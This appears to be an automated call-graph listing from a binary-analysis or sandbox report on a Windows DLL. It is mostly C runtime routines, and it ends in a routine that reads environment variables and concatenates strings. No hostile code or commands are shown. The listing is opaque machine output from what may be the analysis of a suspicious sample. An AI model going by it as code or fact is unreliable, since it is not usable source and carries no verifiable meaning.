RtlDeleteCriticalSection 7818->7820 7819->7820 7821 2a8571e _free 20 API calls 7819->7821 7820->7799 7820->7802 7821->7820 7823 2a88ed4 ___DestructExceptionObject 7822->7823 7832 2a85671 RtlEnterCriticalSection 7823->7832 7825 2a88f77 7837 2a88f97 7825->7837 7829 2a88f83 _abort 7829->7807 7830 2a88e78 66 API calls 7831 2a88ee3 7830->7831 7831->7825 7831->7830 7833 2a87b94 RtlEnterCriticalSection 7831->7833 7834 2a88f6d 7831->7834 7832->7831 7833->7831 7840 2a87ba8 RtlLeaveCriticalSection 7834->7840 7836 2a88f75 7836->7831 7841 2a856b9 RtlLeaveCriticalSection 7837->7841 7839 2a88f9e 7839->7829 7840->7836 7841->7839 7842->7812 7844 2a8a0a8 ___DestructExceptionObject 7843->7844 7845 2a8a0b9 7844->7845 7846 2a8a0ce 7844->7846 7847 2a86368 _free 20 API calls 7845->7847 7855 2a8a0c9 _abort 7846->7855 7859 2a87b94 RtlEnterCriticalSection 7846->7859 7848 2a8a0be 7847->7848 7850 2a862ac ___std_exception_copy 26 API calls 7848->7850 7850->7855 7851 2a8a0ea 7860 2a8a026 7851->7860 7853 2a8a0f5 7876 2a8a112 7853->7876 7855->7812 8124 2a856b9 RtlLeaveCriticalSection 7856->8124 7858 2a8907a 7858->7815 7859->7851 7861 2a8a048 7860->7861 7862 2a8a033 7860->7862 7868 2a8a043 7861->7868 7879 2a88e12 7861->7879 7863 2a86368 _free 20 API calls 7862->7863 7864 2a8a038 7863->7864 7866 2a862ac ___std_exception_copy 26 API calls 7864->7866 7866->7868 7868->7853 7869 2a8907c 20 API calls 7870 2a8a064 7869->7870 7885 2a87a5a 7870->7885 7872 2a8a06a 7892 2a8adce 7872->7892 7875 2a8571e _free 20 API calls 7875->7868 8123 2a87ba8 RtlLeaveCriticalSection 7876->8123 7878 2a8a11a 7878->7855 7880 2a88e2a 7879->7880 7881 2a88e26 7879->7881 7880->7881 7882 2a87a5a 26 API calls 7880->7882 7881->7869 7883 2a88e4a 7882->7883 7907 2a89a22 7883->7907 7886 2a87a7b 7885->7886 7887 2a87a66 7885->7887 7886->7872 7888 2a86368 _free 20 API calls 7887->7888 7889 2a87a6b 7888->7889 7890 2a862ac ___std_exception_copy 26 API calls 7889->7890 7891 2a87a76 7890->7891 7891->7872 7893 2a8addd 7892->7893 7894 2a8adf2 7892->7894 7896 2a86355 __dosmaperr 20 API calls 7893->7896 7895 2a8ae2d 7894->7895 7899 2a8ae19 7894->7899 7897 2a86355 __dosmaperr 20 API calls 7895->7897 7898 2a8ade2 7896->7898 7900 2a8ae32 7897->7900 7901 2a86368 _free 20 API calls 7898->7901 8080 2a8ada6 7899->8080 7903 2a86368 _free 20 API calls 7900->7903 7904 2a8a070 7901->7904 7905 2a8ae3a 7903->7905 7904->7868 7904->7875 7906 2a862ac ___std_exception_copy 26 API calls 7905->7906 7906->7904 7908 2a89a2e ___DestructExceptionObject 7907->7908 7909 2a89a4e 7908->7909 7910 2a89a36 7908->7910 7912 2a89aec 7909->7912 7916 2a89a83 7909->7916 7932 2a86355 7910->7932 7914 2a86355 __dosmaperr 20 API calls 7912->7914 7915 2a89af1 7914->7915 7918 2a86368 _free 20 API calls 7915->7918 7935 2a88c7b RtlEnterCriticalSection 7916->7935 7917 2a86368 _free 20 API calls 7926 2a89a43 _abort 7917->7926 7920 2a89af9 7918->7920 7922 2a862ac ___std_exception_copy 26 API calls 7920->7922 7921 2a89a89 7923 2a89aba 7921->7923 7924 2a89aa5 7921->7924 7922->7926 7936 2a89b0d 7923->7936 7925 2a86368 _free 20 API calls 7924->7925 7928 2a89aaa 7925->7928 7926->7881 7930 2a86355 __dosmaperr 20 API calls 7928->7930 7929 2a89ab5 7987 2a89ae4 7929->7987 7930->7929 7933 2a85b7a __dosmaperr 20 API calls 7932->7933 7934 2a8635a 7933->7934 7934->7917 7935->7921 7937 2a89b3b 7936->7937 7975 2a89b34 7936->7975 7938 2a89b5e 7937->7938 7939 2a89b3f 7937->7939 7942 2a89baf 7938->7942 7943 2a89b92 7938->7943 7941 2a86355 __dosmaperr 20 API calls 7939->7941 7940 2a82ada _ValidateLocalCookies 5 API calls 7944 2a89d15 7940->7944 7945 2a89b44 7941->7945 7947 2a89bc5 7942->7947 7990 2a8a00b 7942->7990 7946 2a86355 __dosmaperr 20 API calls 7943->7946 7944->7929 7948 2a86368 _free 20 API calls 7945->7948 7950 2a89b97 7946->7950 7993 2a896b2 7947->7993 7952 2a89b4b 7948->7952 7954 2a86368 _free 20 API calls 7950->7954 7955 2a862ac ___std_exception_copy 26 API calls 7952->7955 7958 2a89b9f 7954->7958 7955->7975 7956 2a89c0c 7962 2a89c20 7956->7962 7963 2a89c66 WriteFile 7956->7963 7957 2a89bd3 7959 2a89bf9 7957->7959 7960 2a89bd7 7957->7960 7961 2a862ac ___std_exception_copy 26 API calls 7958->7961 8005 2a89492 GetConsoleCP 7959->8005 7964 2a89ccd 7960->7964 8000 2a89645 7960->8000 7961->7975 7967 2a89c28 7962->7967 7968 2a89c56 7962->7968 7966 2a89c89 GetLastError 7963->7966 7971 2a89bef 7963->7971 7964->7975 7976 2a86368 _free 20 API calls 7964->7976 7966->7971 7972 2a89c2d 7967->7972 7973 2a89c46 7967->7973 8031 2a89728 7968->8031 7971->7964 7971->7975 7979 2a89ca9 7971->7979 7972->7964 8016 2a89807 7972->8016 8023 2a898f5 7973->8023 7975->7940 7978 2a89cf2 7976->7978 7980 2a86355 __dosmaperr 20 API calls 7978->7980 7981 2a89cb0 7979->7981 7982 2a89cc4 7979->7982 7980->7975 7984 2a86368 _free 20 API calls 7981->7984 8038 2a86332 7982->8038 7985 2a89cb5 7984->7985 7986 2a86355 __dosmaperr 20 API calls 7985->7986 7986->7975 8079 2a88c9e RtlLeaveCriticalSection 7987->8079 7989 2a89aea 7989->7926 8043 2a89f8d 7990->8043 8065 2a88dbc 7993->8065 7995 2a896c7 7995->7956 7995->7957 7996 2a896c2 7996->7995 7997 2a85af6 _abort 38 API calls 7996->7997 7998 2a896ea 7997->7998 7998->7995 7999 2a89708 GetConsoleMode 7998->7999 7999->7995 8001 2a8969f 8000->8001 8004 2a8966a 8000->8004 8001->7971 8002 2a8a181 WriteConsoleW CreateFileW 8002->8004 8003 2a896a1 GetLastError 8003->8001 8004->8001 8004->8002 8004->8003 8010 2a894f5 8005->8010 8015 2a89607 8005->8015 8006 2a82ada _ValidateLocalCookies 5 API calls 8007 2a89641 8006->8007 8007->7971 8009 2a879e6 40 API calls __fassign 8009->8010 8010->8009 8011 2a8957b WideCharToMultiByte 8010->8011 8014 2a895d2 WriteFile 8010->8014 8010->8015 8074 2a87c19 8010->8074 8012 2a895a1 WriteFile 8011->8012 8011->8015 8012->8010 8013 2a8962a GetLastError 8012->8013 8013->8015 8014->8010 8014->8013 8015->8006 8018 2a89816 8016->8018 8017 2a898d8 8019 2a82ada _ValidateLocalCookies 5 API calls 8017->8019 8018->8017 8020 2a89894 WriteFile 8018->8020 8021 2a898f1 8019->8021 8020->8018 8022 2a898da GetLastError 8020->8022 8021->7971 8022->8017 8024 2a89904 8023->8024 8025 2a89a0f 8024->8025 8028 2a89986 WideCharToMultiByte 8024->8028 8029 2a899bb WriteFile 8024->8029 8026 2a82ada _ValidateLocalCookies 5 API calls 8025->8026 8027 2a89a1e 8026->8027 8027->7971 8028->8029 8030 2a89a07 GetLastError 8028->8030 8029->8024 8029->8030 8030->8025 8032 2a89737 8031->8032 8033 2a897ea 8032->8033 8035 2a897a9 WriteFile 8032->8035 8034 2a82ada _ValidateLocalCookies 5 API calls 8033->8034 8037 2a89803 8034->8037 8035->8032 8036 2a897ec GetLastError 8035->8036 8036->8033 8037->7971 8039 2a86355 __dosmaperr 20 API calls 8038->8039 8040 2a8633d _free 8039->8040 8041 2a86368 _free 20 API calls 8040->8041 8042 2a86350 8041->8042 8042->7975 8052 2a88d52 8043->8052 8045 2a89f9f 8046 2a89fb8 SetFilePointerEx 8045->8046 8047 2a89fa7 8045->8047 8049 2a89fac 8046->8049 8050 2a89fd0 GetLastError 8046->8050 8048 2a86368 _free 20 API calls 8047->8048 8048->8049 8049->7947 8051 2a86332 __dosmaperr 20 API calls 8050->8051 8051->8049 8053 2a88d5f 8052->8053 8054 2a88d74 8052->8054 8055 2a86355 __dosmaperr 20 API calls 8053->8055 8056 2a86355 __dosmaperr 20 API calls 8054->8056 8058 2a88d99 8054->8058 8057 2a88d64 8055->8057 8059 2a88da4 8056->8059 8060 2a86368 _free 20 API calls 8057->8060 8058->8045 8062 2a86368 _free 20 API calls 8059->8062 8061 2a88d6c 8060->8061 8061->8045 8063 2a88dac 8062->8063 8064 2a862ac ___std_exception_copy 26 API calls 8063->8064 8064->8061 8066 2a88dc9 8065->8066 8067 2a88dd6 8065->8067 8068 2a86368 _free 20 API calls 8066->8068 8069 2a88de2 8067->8069 8070 2a86368 _free 20 API calls 8067->8070 8071 2a88dce 8068->8071 8069->7996 8072 2a88e03 8070->8072 8071->7996 8073 2a862ac ___std_exception_copy 26 API calls 8072->8073 8073->8071 8075 2a85af6 _abort 38 API calls 8074->8075 8076 2a87c24 8075->8076 8077 2a87a00 __fassign 38 API calls 8076->8077 8078 2a87c34 8077->8078 8078->8010 8079->7989 8083 2a8ad24 8080->8083 8082 2a8adca 8082->7904 8084 2a8ad30 ___DestructExceptionObject 8083->8084 8094 2a88c7b RtlEnterCriticalSection 8084->8094 8086 2a8ad3e 8087 2a8ad70 8086->8087 8088 2a8ad65 8086->8088 8090 2a86368 _free 20 API calls 8087->8090 8095 2a8ae4d 8088->8095 8091 2a8ad6b 8090->8091 8110 2a8ad9a 8091->8110 8093 2a8ad8d _abort 8093->8082 8094->8086 8096 2a88d52 26 API calls 8095->8096 8099 2a8ae5d 8096->8099 8097 2a8ae63 8113 2a88cc1 8097->8113 8099->8097 8100 2a88d52 26 API calls 8099->8100 8109 2a8ae95 8099->8109 8104 2a8ae8c 8100->8104 8101 2a88d52 26 API calls 8105 2a8aea1 CloseHandle 8101->8105 8102 2a8aedd 8102->8091 8107 2a88d52 26 API calls 8104->8107 8105->8097 8108 2a8aead GetLastError 8105->8108 8106 2a86332 __dosmaperr 20 API calls 8106->8102 8107->8109 8108->8097 8109->8097 8109->8101 8122 2a88c9e RtlLeaveCriticalSection 8110->8122 8112 2a8ada4 8112->8093 8114 2a88cd0 8113->8114 8115 2a88d37 8113->8115 8114->8115 8120 2a88cfa 8114->8120 8116 2a86368 _free 20 API calls 8115->8116 8117 2a88d3c 8116->8117 8118 2a86355 __dosmaperr 20 API calls 8117->8118 8119 2a88d27 8118->8119 8119->8102 8119->8106 8120->8119 8121 2a88d21 SetStdHandle 8120->8121 8121->8119 8122->8112 8123->7878 8124->7858 6566 2a88a89 6569 2a86d60 6566->6569 6570 2a86d69 6569->6570 6571 2a86d72 6569->6571 6573 2a86c5f 6570->6573 6574 2a85af6 _abort 38 API calls 6573->6574 6575 2a86c6c 6574->6575 6593 2a86d7e 6575->6593 6577 2a86c74 6602 2a869f3 6577->6602 6580 2a86c8b 6580->6571 6583 2a86cce 6586 2a8571e _free 20 API calls 6583->6586 6586->6580 6587 2a86cc9 6588 2a86368 _free 20 API calls 6587->6588 6588->6583 6589 2a86d12 6589->6583 6626 2a868c9 6589->6626 6590 2a86ce6 6590->6589 6591 2a8571e _free 20 API calls 6590->6591 6591->6589 6594 2a86d8a ___DestructExceptionObject 6593->6594 6595 2a85af6 _abort 38 API calls 6594->6595 6600 2a86d94 6595->6600 6597 2a86e18 _abort 6597->6577 6599 2a855a8 _abort 38 API calls 6599->6600 6600->6597 6600->6599 6601 2a8571e _free 20 API calls 6600->6601 6629 2a85671 RtlEnterCriticalSection 6600->6629 6630 2a86e0f 6600->6630 6601->6600 6634 2a854a7 6602->6634 6605 2a86a14 GetOEMCP 6607 2a86a3d 6605->6607 6606 2a86a26 6606->6607 6608 2a86a2b GetACP 6606->6608 6607->6580 6609 2a856d0 6607->6609 6608->6607 6610 2a8570e 6609->6610 6611 2a856de __dosmaperr 6609->6611 6613 2a86368 _free 20 API calls 6610->6613 6611->6610 6612 2a856f9 RtlAllocateHeap 6611->6612 6615 2a8474f __dosmaperr 7 API calls 6611->6615 6612->6611 6614 2a8570c 6612->6614 6613->6614 6614->6583 6616 2a86e20 6614->6616 6615->6611 6617 2a869f3 40 API calls 6616->6617 6618 2a86e3f 6617->6618 6620 2a86e90 IsValidCodePage 6618->6620 6623 2a86e46 6618->6623 6625 2a86eb5 ___scrt_fastfail 6618->6625 6619 2a82ada _ValidateLocalCookies 5 API calls 6621 2a86cc1 6619->6621 6622 2a86ea2 GetCPInfo 6620->6622 6620->6623 6621->6587 6621->6590 6622->6623 6622->6625 6623->6619 6781 2a86acb GetCPInfo 6625->6781 6854 2a86886 6626->6854 6628 2a868ed 6628->6583 6629->6600 6633 2a856b9 RtlLeaveCriticalSection 6630->6633 6632 2a86e16 6632->6600 6633->6632 6635 2a854c4 6634->6635 6641 2a854ba 6634->6641 6636 2a85af6 _abort 38 API calls 6635->6636 6635->6641 6637 2a854e5 6636->6637 6642 2a87a00 6637->6642 6641->6605 6641->6606 6643 2a854fe 6642->6643 6644 2a87a13 6642->6644 6646 2a87a2d 6643->6646 6644->6643 6650 2a87f0f 6644->6650 6647 2a87a40 6646->6647 6649 2a87a55 6646->6649 6648 2a86d7e __fassign 38 API calls 6647->6648 6647->6649 6648->6649 6649->6641 6651 2a87f1b ___DestructExceptionObject 6650->6651 6652 2a85af6 _abort 38 API calls 6651->6652 6653 2a87f24 6652->6653 6654 2a87f72 _abort 6653->6654 6662 2a85671 RtlEnterCriticalSection 6653->6662 6654->6643 6656 2a87f42 6663 2a87f86 6656->6663 6661 2a855a8 _abort 38 API calls 6661->6654 6662->6656 6664 2a87f94 __fassign 6663->6664 6666 2a87f56 6663->6666 6664->6666 6670 2a87cc2 6664->6670 6667 2a87f75 6666->6667 6780 2a856b9 RtlLeaveCriticalSection 6667->6780 6669 2a87f69 6669->6654 6669->6661 6672 2a87d42 6670->6672 6673 2a87cd8 6670->6673 6675 2a8571e _free 20 API calls 6672->6675 6697 2a87d90 6672->6697 6673->6672 6679 2a8571e _free 20 API calls 6673->6679 6680 2a87d0b 6673->6680 6674 2a87d9e 6683 2a87dfe 6674->6683 6694 2a8571e 20 API calls _free 6674->6694 6676 2a87d64 6675->6676 6677 2a8571e _free 20 API calls 6676->6677 6681 2a87d77 6677->6681 6678 2a8571e _free 20 API calls 6682 2a87d37 6678->6682 6684 2a87d00 6679->6684 6685 2a8571e _free 20 API calls 6680->6685 6696 2a87d2d 6680->6696 6686 2a8571e _free 20 API calls 6681->6686 6687 2a8571e _free 20 API calls 6682->6687 6688 2a8571e _free 20 API calls 6683->6688 6698 2a890ba 6684->6698 6690 2a87d22 6685->6690 6691 2a87d85 6686->6691 6687->6672 6695 2a87e04 6688->6695 6726 2a891b8 6690->6726 6693 2a8571e _free 20 API calls 6691->6693 6693->6697 6694->6674 6695->6666 6696->6678 6738 2a87e35 6697->6738 6699 2a890cb 6698->6699 6725 2a891b4 6698->6725 6700 2a890dc 6699->6700 6701 2a8571e _free 20 API calls 6699->6701 6702 2a890ee 6700->6702 6703 2a8571e _free 20 API calls 6700->6703 6701->6700 6704 2a89100 6702->6704 6705 2a8571e _free 20 API calls 6702->6705 6703->6702 6706 2a89112 6704->6706 6708 2a8571e _free 20 API calls 6704->6708 6705->6704 6707 2a89124 6706->6707 6709 2a8571e _free 20 API calls 6706->6709 6710 2a89136 6707->6710 6711 2a8571e _free 20 API calls 6707->6711 6708->6706 6709->6707 6712 2a8571e _free 20 API calls 6710->6712 6713 2a89148 6710->6713 6711->6710 6712->6713 6714 2a8571e _free 20 API calls 6713->6714 6718 2a8915a 6713->6718 6714->6718 6715 2a8571e _free 20 API calls 6716 2a8916c 6715->6716 6717 2a8917e 6716->6717 6719 2a8571e _free 20 API calls 6716->6719 6720 2a89190 6717->6720 6721 2a8571e _free 20 API calls 6717->6721 6718->6715 6718->6716 6719->6717 6722 2a891a2 6720->6722 6723 2a8571e _free 20 API calls 6720->6723 6721->6720 6724 2a8571e _free 20 API calls 6722->6724 6722->6725 6723->6722 6724->6725 6725->6680 6727 2a8921d 6726->6727 6728 2a891c5 6726->6728 6727->6696 6729 2a891d5 6728->6729 6730 2a8571e _free 20 API calls 6728->6730 6731 2a891e7 6729->6731 6732 2a8571e _free 20 API calls 6729->6732 6730->6729 6733 2a891f9 6731->6733 6735 2a8571e _free 20 API calls 6731->6735 6732->6731 6734 2a8920b 6733->6734 6736 2a8571e _free 20 API calls 6733->6736 6734->6727 6737 2a8571e _free 20 API calls 6734->6737 6735->6733 6736->6734 6737->6727 6739 2a87e42 6738->6739 6743 2a87e60 6738->6743 6739->6743 6744 2a8925d 6739->6744 6742 2a8571e _free 20 API calls 6742->6743 6743->6674 6745 2a87e5a 6744->6745 6746 2a8926e 6744->6746 6745->6742 6747 2a89221 __fassign 20 API calls 6746->6747 6748 2a89276 6747->6748 6749 2a89221 __fassign 20 API calls 6748->6749 6750 2a89281 6749->6750 6751 2a89221 __fassign 20 API calls 6750->6751 6752 2a8928c 6751->6752 6753 2a89221 __fassign 20 API calls 6752->6753 6754 2a89297 6753->6754 6755 2a89221 __fassign 20 API calls 6754->6755 6756 2a892a5 6755->6756 6757 2a8571e _free 20 API calls 6756->6757 6758 2a892b0 6757->6758 6759 2a8571e _free 20 API calls 6758->6759 6760 2a892bb 6759->6760 6761 2a8571e _free 20 API calls 6760->6761 6762 2a892c6 6761->6762 6763 2a89221 __fassign 20 API calls 6762->6763 6764 2a892d4 6763->6764 6765 2a89221 __fassign 20 API calls 6764->6765 6766 2a892e2 6765->6766 6767 2a89221 __fassign 20 API calls 6766->6767 6768 2a892f3 6767->6768 6769 2a89221 __fassign 20 API calls 6768->6769 6770 2a89301 6769->6770 6771 2a89221 __fassign 20 API calls 6770->6771 6772 2a8930f 6771->6772 6773 2a8571e _free 20 API calls 6772->6773 6774 2a8931a 6773->6774 6775 2a8571e _free 20 API calls 6774->6775 6776 2a89325 6775->6776 6777 2a8571e _free 20 API calls 6776->6777 6778 2a89330 6777->6778 6779 2a8571e _free 20 API calls 6778->6779 6779->6745 6780->6669 6782 2a86baf 6781->6782 6786 2a86b05 6781->6786 6785 2a82ada _ValidateLocalCookies 5 API calls 6782->6785 6788 2a86c5b 6785->6788 6791 2a886e4 6786->6791 6788->6623 6790 2a88a3e 43 API calls 6790->6782 6792 2a854a7 __fassign 38 API calls 6791->6792 6793 2a88704 MultiByteToWideChar 6792->6793 6795 2a887da 6793->6795 6796 2a88742 6793->6796 6797 2a82ada _ValidateLocalCookies 5 API calls 6795->6797 6799 2a856d0 21 API calls 6796->6799 6801 2a88763 ___scrt_fastfail 6796->6801 6800 2a86b66 6797->6800 6798 2a887d4 6810 2a88801 6798->6810 6799->6801 6805 2a88a3e 6800->6805 6801->6798 6803 2a887a8 MultiByteToWideChar 6801->6803 6803->6798 6804 2a887c4 GetStringTypeW 6803->6804 6804->6798 6806 2a854a7 __fassign 38 API calls 6805->6806 6807 2a88a51 6806->6807 6814 2a88821 6807->6814 6811 2a8880d 6810->6811 6812 2a8881e 6810->6812 6811->6812 6813 2a8571e _free 20 API calls 6811->6813 6812->6795 6813->6812 6816 2a8883c 6814->6816 6815 2a88862 MultiByteToWideChar 6817 2a88a16 6815->6817 6818 2a8888c 6815->6818 6816->6815 6819 2a82ada _ValidateLocalCookies 5 API calls 6817->6819 6821 2a856d0 21 API calls 6818->6821 6824 2a888ad 6818->6824 6820 2a86b87 6819->6820 6820->6790 6821->6824 6822 2a888f6 MultiByteToWideChar 6823 2a8890f 6822->6823 6837 2a88962 6822->6837 6841 2a85f19 6823->6841 6824->6822 6824->6837 6826 2a88801 __freea 20 API calls 6826->6817 6828 2a88939 6831 2a85f19 11 API calls 6828->6831 6828->6837 6829 2a88971 6830 2a856d0 21 API calls 6829->6830 6833 2a88992 6829->6833 6830->6833 6831->6837 6832 2a88a07 6835 2a88801 __freea 20 API calls 6832->6835 6833->6832 6834 2a85f19 11 API calls 6833->6834 6836 2a889e6 6834->6836 6835->6837 6836->6832 6838 2a889f5 WideCharToMultiByte 6836->6838 6837->6826 6838->6832 6839 2a88a35 6838->6839 6840 2a88801 __freea 20 API calls 6839->6840 6840->6837 6842 2a85c45 __dosmaperr 5 API calls 6841->6842 6843 2a85f40 6842->6843 6846 2a85f49 6843->6846 6849 2a85fa1 6843->6849 6847 2a82ada _ValidateLocalCookies 5 API calls 6846->6847 6848 2a85f9b 6847->6848 6848->6828 6848->6829 6848->6837 6850 2a85c45 __dosmaperr 5 API calls 6849->6850 6851 2a85fc8 6850->6851 6852 2a82ada _ValidateLocalCookies 5 API calls 6851->6852 6853 2a85f89 LCMapStringW 6852->6853 6853->6846 6855 2a86892 ___DestructExceptionObject 6854->6855 6862 2a85671 RtlEnterCriticalSection 6855->6862 6857 2a8689c 6863 2a868f1 6857->6863 6861 2a868b5 _abort 6861->6628 6862->6857 6875 2a87011 6863->6875 6865 2a8693f 6866 2a87011 26 API calls 6865->6866 6867 2a8695b 6866->6867 6868 2a87011 26 API calls 6867->6868 6869 2a86979 6868->6869 6870 2a868a9 6869->6870 6871 2a8571e _free 20 API calls 6869->6871 6872 2a868bd 6870->6872 6871->6870 6889 2a856b9 RtlLeaveCriticalSection 6872->6889 6874 2a868c7 6874->6861 6876 2a87022 6875->6876 6885 2a8701e 6875->6885 6877 2a87029 6876->6877 6880 2a8703c ___scrt_fastfail 6876->6880 6878 2a86368 _free 20 API calls 6877->6878 6879 2a8702e 6878->6879 6881 2a862ac ___std_exception_copy 26 API calls 6879->6881 6882 2a8706a 6880->6882 6883 2a87073 6880->6883 6880->6885 6881->6885 6884 2a86368 _free 20 API calls 6882->6884 6883->6885 6887 2a86368 _free 20 API calls 6883->6887 6886 2a8706f 6884->6886 6885->6865 6888 2a862ac ___std_exception_copy 26 API calls 6886->6888 6887->6886 6888->6885 6889->6874 7292 2a82049 7293 2a82055 ___DestructExceptionObject 7292->7293 7294 2a8207d 7293->7294 7295 2a820d3 7293->7295 7305 2a8205e 7293->7305 7306 2a8244c 7294->7306 7327 2a82639 IsProcessorFeaturePresent 7295->7327 7298 2a820da 7299 2a82082 7315 2a82308 7299->7315 7301 2a82087 __RTC_Initialize 7318 2a820c4 7301->7318 7303 2a8209f 7321 2a8260b 7303->7321 7307 2a82451 ___scrt_release_startup_lock 7306->7307 7308 2a82455 7307->7308 7312 2a82461 7307->7312 7309 2a8527a _abort 20 API calls 7308->7309 7310 2a8245f 7309->7310 7310->7299 7311 2a8246e 7311->7299 7312->7311 7313 2a8499b _abort 28 API calls 7312->7313 7314 2a84bbd 7313->7314 7314->7299 7331 2a834c7 RtlInterlockedFlushSList 7315->7331 7317 2a82312 7317->7301 7333 2a8246f 7318->7333 7320 2a820c9 ___scrt_release_startup_lock 7320->7303 7322 2a82617 7321->7322 7323 2a8262d 7322->7323 7361 2a853ed 7322->7361 7323->7305 7328 2a8264e ___scrt_fastfail 7327->7328 7329 2a826f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7328->7329 7330 2a82744 ___scrt_fastfail 7329->7330 7330->7298 7332 2a834d7 7331->7332 7332->7317 7338 2a853ff 7333->7338 7345 2a85c2b 7338->7345 7341 2a8391b 7342 2a8354d 7341->7342 7343 2a83925 7341->7343 7342->7320 7356 2a83b2c 7343->7356 7346 2a82476 7345->7346 7347 2a85c35 7345->7347 7346->7341 7349 2a85db2 7347->7349 7350 2a85c45 __dosmaperr 5 API calls 7349->7350 7351 2a85dd9 7350->7351 7352 2a85df1 TlsFree 7351->7352 7353 2a85de5 7351->7353 7352->7353 7354 2a82ada _ValidateLocalCookies 5 API calls 7353->7354 7355 2a85e02 7354->7355 7355->7346 7357 2a83a82 try_get_function 5 API calls 7356->7357 7358 2a83b46 7357->7358 7359 2a83b5e TlsFree 7358->7359 7360 2a83b52 7358->7360 7359->7360 7360->7342 7372 2a874da 7361->7372 7364 2a83529 7365 2a83532 7364->7365 7366 2a83543 7364->7366 7367 2a8391b ___vcrt_uninitialize_ptd 6 API calls 7365->7367 7366->7323 7368 2a83537 7367->7368 7376 2a83972 7368->7376 7373 2a874f3 7372->7373 7374 2a82ada _ValidateLocalCookies 5 API calls 7373->7374 7375 2a82625 7374->7375 7375->7364 7377 2a8353c 7376->7377 7378 2a8397d 7376->7378 7380 2a83c50 7377->7380 7379 2a83987 RtlDeleteCriticalSection 7378->7379 7379->7377 7379->7379 7381 2a83c59 7380->7381 7383 2a83c7f 7380->7383 7382 2a83c69 FreeLibrary 7381->7382 7381->7383 7382->7381 7383->7366 6890 2a8508a 6891 2a8509c 6890->6891 6892 2a850a2 6890->6892 6894 2a85000 6891->6894 6895 2a8502a 6894->6895 6896 2a8500d 6894->6896 6895->6892 6897 2a85024 6896->6897 6898 2a8571e _free 20 API calls 6896->6898 6899 2a8571e _free 20 API calls 6897->6899 6898->6896 6899->6895 7165 2a8220c 7166 2a8221a dllmain_dispatch 7165->7166 7167 2a82215 7165->7167 7169 2a822b1 7167->7169 7170 2a822c7 7169->7170 7172 2a822d0 7170->7172 7173 2a82264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7170->7173 7172->7166 7173->7172 7384 2a8724e GetProcessHeap 7385 2a8284f 7386 2a82882 std::exception::exception 27 API calls 7385->7386 7387 2a8285d 7386->7387 6900 2a87a80 6901 2a87a8d 6900->6901 6902 2a8637b __dosmaperr 20 API calls 6901->6902 6903 2a87aa7 6902->6903 6904 2a8571e _free 20 API calls 6903->6904 6905 2a87ab3 6904->6905 6906 2a8637b __dosmaperr 20 API calls 6905->6906 6909 2a87ad9 6905->6909 6907 2a87acd 6906->6907 6910 2a8571e _free 20 API calls 6907->6910 6911 2a87ae5 6909->6911 6912 2a85eb7 6909->6912 6910->6909 6913 2a85c45 __dosmaperr 5 API calls 6912->6913 6914 2a85ede 6913->6914 6915 2a85efc InitializeCriticalSectionAndSpinCount 6914->6915 6918 2a85ee7 6914->6918 6915->6918 6916 2a82ada _ValidateLocalCookies 5 API calls 6917 2a85f13 6916->6917 6917->6909 6918->6916 7388 2a88640 7391 2a88657 7388->7391 7392 2a88679 7391->7392 7393 2a88665 7391->7393 7395 2a88681 7392->7395 7396 2a88693 7392->7396 7394 2a86368 _free 20 API calls 7393->7394 7397 2a8866a 7394->7397 7398 2a86368 _free 20 API calls 7395->7398 7399 2a854a7 __fassign 38 API calls 7396->7399 7402 2a88652 7396->7402 7400 2a862ac ___std_exception_copy 26 API calls 7397->7400 7401 2a88686 7398->7401 7399->7402 7400->7402 7403 2a862ac ___std_exception_copy 26 API calls 7401->7403 7403->7402 7730 2a85303 7733 2a850a5 7730->7733 7742 2a8502f 7733->7742 7736 2a8502f 5 API calls 7737 2a850c3 7736->7737 7738 2a85000 20 API calls 7737->7738 7739 2a850ce 7738->7739 7740 2a85000 20 API calls 7739->7740 7741 2a850d9 7740->7741 7743 2a85048 7742->7743 7744 2a82ada _ValidateLocalCookies 5 API calls 7743->7744 7745 2a85069 7744->7745 7745->7736 7746 2a87103 GetCommandLineA GetCommandLineW 8125 2a8af43 8126 2a8af59 8125->8126 8127 2a8af4d 8125->8127 8127->8126 8128 2a8af52 CloseHandle 8127->8128 8128->8126 8129 2a8a945 8133 2a8a96d 8129->8133 8130 2a8a9a5 8131 2a8a99e 8138 2a8aa00 8131->8138 8132 2a8a997 8134 2a8aa17 21 API calls 8132->8134 8133->8130 8133->8131 8133->8132 8136 2a8a99c 8134->8136 8139 2a8aa20 8138->8139 8140 2a8b19b __startOneArgErrorHandling 21 API calls 8139->8140 8141 2a8a9a3 8140->8141 7564 2a8a1c6 IsProcessorFeaturePresent 7565 2a87bc7 7566 2a87bd3 ___DestructExceptionObject 7565->7566 7567 2a87c0a _abort 7566->7567 7573 2a85671 RtlEnterCriticalSection 7566->7573 7569 2a87be7 7570 2a87f86 __fassign 20 API calls 7569->7570 7571 2a87bf7 7570->7571 7574 2a87c10 7571->7574 7573->7569 7577 2a856b9 RtlLeaveCriticalSection 7574->7577 7576 2a87c17 7576->7567 7577->7576 7174 2a82418 7175 2a82420 ___scrt_release_startup_lock 7174->7175 7178 2a847f5 7175->7178 7177 2a82448 7179 2a84808 7178->7179 7180 2a84804 7178->7180 7183 2a84815 7179->7183 7180->7177 7184 2a85b7a __dosmaperr 20 API calls 7183->7184 7187 2a8482c 7184->7187 7185 2a82ada _ValidateLocalCookies 5 API calls 7186 2a84811 7185->7186 7186->7177 7187->7185 6919 2a84a9a 6920 2a85411 38 API calls 6919->6920 6921 2a84aa2 6920->6921 6129 2a81c5b 6130 2a81c6b ___scrt_fastfail 6129->6130 6133 2a812ee 6130->6133 6132 2a81c87 6134 2a81324 ___scrt_fastfail 6133->6134 6135 2a813b7 GetEnvironmentVariableW 6134->6135 6159 2a810f1 6135->6159 6138 2a810f1 57 API calls 6139 2a81465 6138->6139 6140 2a810f1 57 API calls 6139->6140 6141 2a81479 6140->6141 6142 2a810f1 57 API calls 6141->6142 6143 2a8148d 6142->6143 6144 2a810f1 57 API calls 6143->6144 6145 2a814a1 6144->6145 6146 2a810f1 57 API calls 6145->6146 6147 2a814b5 lstrlenW 6146->6147 6148 2a814d9 lstrlenW 6147->6148 6149 2a814d2 6147->6149 6150 2a810f1 57 API calls 6148->6150 6149->6132 6151 2a81501 lstrlenW lstrcatW 6150->6151 6152 2a810f1 57 API calls 6151->6152 6153 2a81539 lstrlenW lstrcatW 6152->6153 6154 2a810f1 57 API calls 6153->6154 6155 2a8156b lstrlenW lstrcatW 6154->6155 6156 2a810f1 57 API calls 